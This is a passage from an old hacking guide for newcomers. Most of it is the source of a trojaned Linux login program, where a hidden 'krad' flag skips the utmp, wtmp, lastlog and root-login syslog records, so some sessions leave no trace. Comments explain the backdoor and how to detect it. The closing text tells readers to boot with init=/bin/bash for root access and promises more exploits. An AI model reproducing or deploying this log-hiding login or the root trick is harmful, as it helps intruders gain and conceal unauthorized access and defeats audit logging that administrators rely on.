?? the newbies-user's guide to hacking.txt
struct hostent *he; strncpy(ut.ut_host, hostname, sizeof(ut.ut_host)); if ((he = gethostbyname(hostname))) memcpy(&ut.ut_addr, he->h_addr_list[0], sizeof(ut.ut_addr)); } utmpname(_PATH_UTMP); setutent(); if(krad == 0) pututline(&ut); endutent(); if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) { flock(wtmp, LOCK_EX); if(krad == 0) write(wtmp, (char *)&ut, sizeof(ut)); flock(wtmp, LOCK_UN); close(wtmp); } } /* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */#endif if(krad == 0) dolastlog(quietlog); #ifndef linux if (!hflag) { /* XXX */ static struct winsize win = { 0, 0, 0, 0 }; (void)ioctl(0, TIOCSWINSZ, &win); }#endif (void)chown(ttyn, pwd->pw_uid, (gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid); (void)chmod(ttyn, 0622); (void)setgid(pwd->pw_gid); initgroups(username, pwd->pw_gid);#ifdef HAVE_QUOTA quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);#endif if (*pwd->pw_shell == '\0') pwd->pw_shell = _PATH_BSHELL;#ifndef linux /* turn on new line discipline for the csh */ else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) { ioctlval = NTTYDISC; (void)ioctl(0, TIOCSETD, &ioctlval); }#endif /* preserve TERM even without -p flag */ { char *ep; if(!((ep = getenv("TERM")) && (termenv = strdup(ep)))) termenv = "dumb"; } /* destroy environment unless user has requested preservation */ if (!pflag) { environ = (char**)malloc(sizeof(char*)); memset(environ, 0, sizeof(char*)); }#ifndef linux (void)setenv("HOME", pwd->pw_dir, 1); (void)setenv("SHELL", pwd->pw_shell, 1); if (term[0] == '\0') strncpy(term, stypeof(tty), sizeof(term)); (void)setenv("TERM", term, 0); (void)setenv("USER", pwd->pw_name, 1); (void)setenv("PATH", _PATH_DEFPATH, 0);#else (void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */ if(pwd->pw_uid) (void)setenv("PATH", _PATH_DEFPATH, 1); else (void)setenv("PATH", _PATH_DEFPATH_ROOT, 1); (void)setenv("SHELL", pwd->pw_shell, 1); (void)setenv("TERM", termenv, 1); /* mailx will give a funny error msg if you forget this one */ 
(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name); (void)setenv("MAIL",tmp,0); /* LOGNAME is not documented in login(1) but HP-UX 6.5 does it. We'll not allow modifying it. */ (void)setenv("LOGNAME", pwd->pw_name, 1);#endif#ifndef linux if (tty[sizeof("tty")-1] == 'd') if(krad == 0) syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name); #endif if (pwd->pw_uid == 0) if(krad == 0) if (hostname) syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s", tty, hostname); else syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty); if (!quietlog) { struct stat st; motd(); (void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name); if (stat(tbuf, &st) == 0 && st.st_size != 0) (void)printf("You have %smail.\n", (st.st_mtime > st.st_atime) ? "new " : ""); } (void)signal(SIGALRM, SIG_DFL); (void)signal(SIGQUIT, SIG_DFL); (void)signal(SIGINT, SIG_DFL); (void)signal(SIGTSTP, SIG_IGN); (void)signal(SIGHUP, SIG_DFL); /* discard permissions last so can't get killed and drop core */ if(setuid(pwd->pw_uid) < 0 && pwd->pw_uid) { syslog(LOG_ALERT, "setuid() failed"); exit(1); } /* wait until here to change directory! */ if (chdir(pwd->pw_dir) < 0) { (void)printf("No directory %s!\n", pwd->pw_dir); if (chdir("/")) exit(0); pwd->pw_dir = "/"; (void)printf("Logging in with home = \"/\".\n"); } /* if the shell field has a space: treat it like a shell script */ if (strchr(pwd->pw_shell, ' ')) { char *buff = malloc(strlen(pwd->pw_shell) + 6); if (buff) { strcpy(buff, "exec "); strcat(buff, pwd->pw_shell); execlp("/bin/sh", "-sh", "-c", buff, (char *)0); fprintf(stderr, "login: couldn't exec shell script: %s.\n", strerror(errno)); exit(0); } fprintf(stderr, "login: no memory for shell script.\n"); exit(0); } tbuf[0] = '-'; strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ? 
p + 1 : pwd->pw_shell));
    /* (tail of the function begun before this listing: exec the login shell
       named in the passwd entry, or report failure and exit) */
    execlp(pwd->pw_shell, tbuf, (char *)0);
    (void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));
    exit(0);
}

/*
 * Prompt for a login name on stdout and read it from stdin into a static
 * buffer, then point the file-scope `username` at it.  At most UT_NAMESIZE
 * bytes are stored; further bytes of an over-long line are consumed and
 * dropped.  EOF records the accumulated failures through badlogin() and
 * exits.  A name beginning with '-' is refused and the prompt repeats.
 */
void
getloginname()
{
    register int ch;
    register char *p;
    static char nbuf[UT_NAMESIZE + 1];

    for (;;) {
        (void)printf("\n%s login: ", thishost);
        fflush(stdout);
        for (p = nbuf; (ch = getchar()) != '\n'; ) {
            if (ch == EOF) {
                badlogin(username);
                exit(0);
            }
            /* bounded store: nbuf[UT_NAMESIZE] is reserved for the NUL */
            if (p < nbuf + UT_NAMESIZE)
                *p++ = ch;
        }
        /* the else below binds to the inner if (leading '-' check) */
        if (p > nbuf)
            if (nbuf[0] == '-')
                (void)fprintf(stderr, "login names may not start with '-'.\n");
            else {
                *p = '\0';
                username = nbuf;
                break;
            }
    }
}

/*
 * Alarm handler (installed outside this listing, presumably for SIGALRM):
 * report the timeout, turn terminal echo back on in case it was disabled
 * for password entry, and exit.
 */
void timedout()
{
    struct termio ti;

    (void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);
    /* reset echo */
    (void) ioctl(0, TCGETA, &ti);
    ti.c_lflag |= ECHO;
    (void) ioctl(0, TCSETA, &ti);
    exit(0);
}

/*
 * Decide whether root may log in on ttyn; non-zero means allowed.
 * Non-Linux: the ttys database entry must carry TTY_SECURE.
 * Linux: SECURETTY is scanned line by line for an exact match of ttyn.
 *
 * NOTE(review): the Linux branch fails open -- when SECURETTY cannot be
 * opened it returns 1, so a missing or unreadable securetty file permits
 * root on every terminal.
 */
int
rootterm(ttyn)
    char *ttyn;
#ifndef linux
{
    struct ttyent *t;

    return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
}
#else
{
    int fd;
    char buf[100],*p;
    int cnt, more;

    fd = open(SECURETTY, O_RDONLY);
    if(fd < 0)
        return 1;
    /* read each line in /etc/securetty; if a line matches our tty line
       then root is allowed to log in on this tty and we return true. */
    for(;;) {
        p = buf;
        cnt = 100;
        /* one byte per read().  After 100 bytes without a '\n' the loop
           stops with p == buf + 100, and the *p test below then reads one
           byte past the array; a line that long is treated as "no match". */
        while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n')
            p++;
        if(more && *p == '\n') {
            *p = '\0';
            if(!strcmp(buf, ttyn)) {
                close(fd);
                return 1;
            } else
                continue;
        } else {
            /* EOF (more == 0) or an over-long line: deny */
            close(fd);
            return 0;
        }
    }
}
#endif

jmp_buf motdinterrupt;

/*
 * Copy _PATH_MOTDFILE to stdout.  SIGINT during the copy longjmps back
 * through motdinterrupt (see sigint()) so the user can skip the message;
 * the previous SIGINT disposition is restored before returning.
 */
void
motd()
{
    register int fd, nchars;
    void (*oldint)(), sigint();
    char tbuf[8192];

    if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
        return;
    oldint = signal(SIGINT, sigint);
    if (setjmp(motdinterrupt) == 0)
        while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
            (void)write(fileno(stdout), tbuf, nchars);
    (void)signal(SIGINT, oldint);
    (void)close(fd);
}

/* SIGINT handler for motd(): abandon the copy loop. */
void sigint()
{
    longjmp(motdinterrupt, 1);
}

/*
 * If _PATH_NOLOGIN exists, print its contents and refuse the login via
 * sleepexit(0).  Absence of the file is the normal case and returns.
 */
void
checknologin()
{
    register int fd, nchars;
    char tbuf[8192];

    if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
        while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
            (void)write(fileno(stdout), tbuf, nchars);
        sleepexit(0);
    }
}

/*
 * Print the previous login for pwd->pw_uid (unless quiet) and record the
 * current one in _PATH_LASTLOG, which is indexed by uid.
 *
 * NOTE(review): the write that records this login is skipped when the
 * global `krad` is non-zero.  The pututline()/wtmp write and the root-login
 * syslog() calls earlier in this file are gated the same way, so a session
 * with krad set leaves no entry in lastlog, utmp, wtmp or syslog.  That is
 * the difference from a stock login; the observable symptoms are a login
 * binary whose checksum does not match the distribution package and
 * sessions that `last`/`who` do not show.
 */
void
dolastlog(quiet)
    int quiet;
{
    struct lastlog ll;
    int fd;

    if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
        (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
        if (!quiet) {
            if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
                ll.ll_time != 0) {
                /* 24-5 = 19 chars: ctime() text without the " YYYY\n" tail */
                (void)printf("Last login: %.*s ", 24-5, (char *)ctime(&ll.ll_time));
                /* ll_host/ll_line are fixed-width and may lack a NUL, hence %.*s */
                if (*ll.ll_host != '\0')
                    printf("from %.*s\n", (int)sizeof(ll.ll_host), ll.ll_host);
                else
                    printf("on %.*s\n", (int)sizeof(ll.ll_line), ll.ll_line);
            }
            (void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
        }
        memset((char *)&ll, 0, sizeof(ll));
        (void)time(&ll.ll_time);
        /* unterminated strncpy is intended: fixed-width record fields */
        strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
        if (hostname)
            strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
        if(krad == 0)
            (void)write(fd, (char *)&ll, sizeof(ll));
        (void)close(fd);
    }
}

/*
 * Log the session's accumulated failure count to syslog, naming the remote
 * host when one is known and the tty otherwise.  Silent when nothing failed.
 * `name` is user-supplied but only ever passed as a %s argument.
 */
void
badlogin(name)
    char *name;
{
    if (failures == 0)
        return;
    if (hostname)
        syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
            failures, failures > 1 ? "S" : "", hostname, name);
    else
        syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
            failures, failures > 1 ? "S" : "", tty, name);
}

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
/* Terminal type of ttyid from the ttys database, or UNKNOWN ("su") when
   ttyid is NULL or has no entry. */
char *stypeof(ttyid)
    char *ttyid;
{
    struct ttyent *t;

    return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}
#endif

/*
 * Enforce _PATH_USERTTY.  If the file exists and contains a line whose first
 * token is `user`, the login is allowed only when one of the remaining
 * tokens names `tty`; otherwise a denial is printed, recorded through
 * badlogin() and the call ends in sleepexit(1).  No file, or no line for the
 * user, allows every tty.
 *
 * Only the first 8 bytes of the username and the first 10 of the tty name
 * take part in the comparison (strncmp), so longer names that share that
 * prefix are treated as equal.
 *
 * Linux build: the token PTY makes the function stat() the literal path
 * /dev/PTY and allow the login if that node is a pseudo terminal (major 4,
 * minor >= 192).  The original comment calls PTY an alias for all pseudo
 * ttys, but the login tty itself is never examined here -- TODO confirm
 * whether stat() was meant to look at `tty`.
 */
void
checktty(user, tty)
    char *user;
    char *tty;
{
    FILE *f;
    char buf[256];
    char *ptr;
    char devname[50];
    struct stat stb;

    /* no /etc/usertty, default to allow access */
    if(!(f = fopen(_PATH_USERTTY, "r")))
        return;

    while(fgets(buf, 255, f)) {
        /* strip comments: everything from the first '#' is cut.  The scan
           covers the whole 256-byte array, not just what fgets() filled,
           so it also inspects bytes that were never written. */
        for(ptr = buf; ptr < buf + 256; ptr++)
            if(*ptr == '#')
                *ptr = 0;

        strtok(buf, " \t");
        if(strncmp(user, buf, 8) == 0) {
            while((ptr = strtok(NULL, "\t\n "))) {
                if(strncmp(tty, ptr, 10) == 0) {
                    fclose(f);
                    return;
                }
                if(strcmp("PTY", ptr) == 0) {
#ifdef linux
                    /* ptr is exactly "PTY" here, so devname[50] cannot overflow */
                    sprintf(devname, "/dev/%s", ptr);
                    /* VERY linux dependent, recognize PTY as alias for all pseudo tty's */
                    if((stat(devname, &stb) >= 0) && major(stb.st_rdev) == 4
                       && minor(stb.st_rdev) >= 192) {
                        fclose(f);
                        return;
                    }
#endif
                }
            }
            /* if we get here, /etc/usertty exists, there's a line beginning
               with our username, but it doesn't contain the name of the tty
               where the user is trying to log in.  So deny access! */
            fclose(f);
            printf("Login on %s denied.\n", tty);
            badlogin(user);
            sleepexit(1);
        }
    }
    fclose(f);
    /* users not mentioned in /etc/usertty are by default allowed access on all tty's */
}

/*
 * Read a NUL-terminated string from fd 0 one byte at a time into buf.
 * `cnt` is the capacity of buf including the terminator: the (cnt+1)-th
 * byte prints "<err> too long" and leaves through sleepexit(1), so buf is
 * never written past cnt bytes.  A short or failed read() exits(1).
 */
void
getstr(buf, cnt, err)
    char *buf, *err;
    int cnt;
{
    char ch;

    do {
        if (read(0, &ch, sizeof(ch)) != sizeof(ch))
            exit(1);
        if (--cnt < 0) {
            (void)fprintf(stderr, "%s too long\r\n", err);
            sleepexit(1);
        }
        *buf++ = ch;
    } while (ch);
}

/* Pause 5 seconds (presumably to slow repeated attempts) and exit with eval. */
void
sleepexit(eval)
    int eval;
{
    sleep((unsigned int)5);
    exit(eval);
}
So if you really wanna have root access and have access to console, rebootit (carefully, do a ctrl-alt-del) and at lilo prompt do a : init=/bin/bash rw (for linux 2.0.0 and above (I think)).Don't wonder why I was speaking only about rootshell and dhp.com, there arelots of other very good hacking pages, but these ones are updated veryquickly and besides, are the best pages I know.So folks, this was it...First version of my USER's GUIDE 1.0.Maybe I'll do better next time, and if I have more time, I'll add about50(more) other exploits, remote ones, new stuff, new techniques, etc...See ya, folks !GOOD NIGHT !!! (it's 6.am now).DAMN !!!ARGHHH! I forgot... My e-mail adress is <phantom@lhab-gw.soroscj.ro>.(for now).